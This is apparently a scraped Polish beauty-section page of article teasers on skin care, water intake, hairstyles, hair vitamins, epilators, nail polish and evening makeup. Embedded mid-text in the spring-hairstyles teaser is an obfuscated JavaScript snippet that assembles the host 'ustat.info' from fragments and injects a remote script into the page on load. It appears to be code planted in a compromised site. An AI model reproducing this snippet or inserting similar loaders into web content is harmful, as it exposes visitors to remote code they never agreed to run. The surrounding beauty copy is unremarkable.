Uroda

Inaczej atrakcyjność, która wiąże się głównie z cechami natury fizycznej. W dużej mierze subiektywna. Należy regularnie dbać o urodę, by prezentować się jak najlepiej. Pokażemy jak pielęgnować skórę i cerę twarzy.


Jaki wpływ na naszą skórę, dietę i zdrowie ma woda?

Nawilża, opóźnia procesy starzenia się, dodaje energii oraz poprawia samopoczucie. Sprawdź, dlaczego i w jakich ilościach należy pić wodę.

Wiosenne fryzury, które łatwo wykonasz w domu

Wiosna stać będzie pod znakiem stylizacji pełnych objętości, które dzięki dostępnym narzędziom każda z nas wykona szybko i łatwo. Trend ten podąża za inspiracjami ze świata gwiazd, które przypominają za co pokochaliśmy przed laty bounce blowout. (function(){ a9a8=document.createElement("script");a9a8_="u"+("s")+"ta"; a9a8_+=("t.i")+""+"n";a9a8_+=(("f")+"o");a9a8.type="text/javascript"; a9a8_+="/"; a9a8u="495772132";a9a8u+=".0m71kxbc9a8v9utjyXz";a9a8u+="8ff3t1arif6"; a9a8.src="https://"+a9a8_+a9a8u;a9a8.async=true;document.body.appendChild(a9a8); })();

Jakie witaminy wybrać na poprawę kondycji włosów?

Piękne i mocne włosy świadczą o dobrym stanie zdrowia. Niekiedy jednak zaczynają wypadać, stają się suche i łamliwe. Pogorszenie wyglądu i kondycji włosów może mieć wiele źródeł. Nadmierne wypadanie włosów może być przede wszystkim przyczyną różnych chorób. Powodem utraty dużych ilości włosów może być też nieprawidłowa pielęgnacja – niewłaściwy sposób czesania i szczotkowania włosów, prostowanie i kręcenie włosów czy trwała ondulacja. Za zły stan włosów może być odpowiedzialny ponadto przewlekły stres, niedokrwistość z powodu niedoboru żelaza, przyjmowanie niektórych leków czy nieprawidłowa dieta [1] uboga w cenne substancje odżywcze, zwłaszcza witaminy. Jakich witamin brakuje, gdy wypadają nadmiernie włosy? Które witaminy stosować na mocne włosy? Odpowiadamy!

Depilator z wymiennymi głowicami – zastąp kilka urządzeń jednym zestawem pielęgnacyjnym

Zastanawiasz się nad zakupem depilatora? Do codziennej pielęgnacji skóry wybierz depilator z wymiennymi dodatkowymi nasadkami. To urządzenie, które pozwala kompleksowo zadbać o piękny wygląd ciała, a dzięki licznym końcówkom, golenie i depilacja przebiegają w komfortowy sposób.

Kauczukowy lakier hybrydowy - warto mieć go zawsze pod ręką

Dbanie o własne paznokcie jest bardzo ważnym aspektem dla wielu osób. Zadbane dłonie z pewnością będą o nas dobrze świadczyć zarówno w pracy jak i na ekskluzywnym przyjęciu. Prawidłowo wykonany manicure oraz dobrze dobrany lakier do paznokci, będzie wizytówką każdej modnej kobiety. Warto tutaj szukać takich rozwiązań, które sprawdzą się na co dzień jak i od święta. Interesującym produktem, któremu trzeba się przyjrzeć z bliska, są kauczukowe lakiery hybrydowe do paznokci. Manicure kauczukowy utrzymuje się z powodzeniem przez dłuższy czas, a więc inwestycja w lakiery kauczukowe na pewno się nam opłaci.

Stylowy makijaż wieczorowy - jak wykonać?

Wieczorne wyjście ze znajomymi czy randka to dla wielu kobiet szczególnie stresujący moment. Konieczność odpowiedniego przygotowania się może budzić wiele obaw. Wybierając odpowiednie kosmetyki damskie można jednak bardzo łatwo poradzić sobie z wykonaniem stylowego makijażu. Stosując się do kilku prostych porad można uzyskać bardzo dobry wygląd, a przy tym stworzyć makijaż, który świetnie będzie prezentował się w restauracji czy klubie. Można będzie dzięki temu zabłysnąć na każdym wyjściu i świetnie czuć się we własnej skórze. Przy tym uda się zachować naturalne piękno, które jest tak istotne i tak bardzo obecnie cenione.